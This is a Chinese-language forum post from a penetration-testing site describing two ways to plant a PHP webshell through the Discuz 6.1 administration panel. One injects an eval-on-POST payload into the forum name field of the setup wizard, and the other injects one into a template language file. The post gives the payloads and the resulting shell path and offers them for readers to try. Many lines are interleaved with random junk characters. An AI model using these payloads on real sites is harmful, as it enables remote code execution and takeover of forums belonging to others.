中国网络渗透测试联盟

标题: discuz6.1后台拿shell方法 [打印本页]
作者: admin    时间: 2012-9-13 16:59
标题: discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell: @  D+ O* ^/ @% l; t6 P1 p
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
% S( {0 e0 r" r2 z9 X+ Y1:
! ^" {9 T$ J( N' f5 |http://127.0.0.1/discuz/admincp. ... zard&frames=yes
, i( W3 z! n, Z  p9 b+ oadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
& K. ~* Z7 b* z; ?9 Q: ^<?php eval($_POST[cmd]);?>
! r; R2 l3 H. x7 B' X6 i' Y后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php6 R3 o8 a' Z  _# ^+ V% {

9 Q1 ~6 ~& t' q/ A4 h* {: i
' j# ]! u8 P, o" g1 o4 l2:后台模板管理--默认模板套系--详情5 I- G6 g; P3 y6 k6 e7 `' B
templates/default/actions.lang.php
& o0 p8 _( u( D4 R" ]5 B  \; }& njhackj\\');eval($_POST[cmd])?>;//3 J$ B$ E7 u% o4 P( F0 Z

) C  R" C' G( J, a4 f利用很简单,聪明的人一看就懂了



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2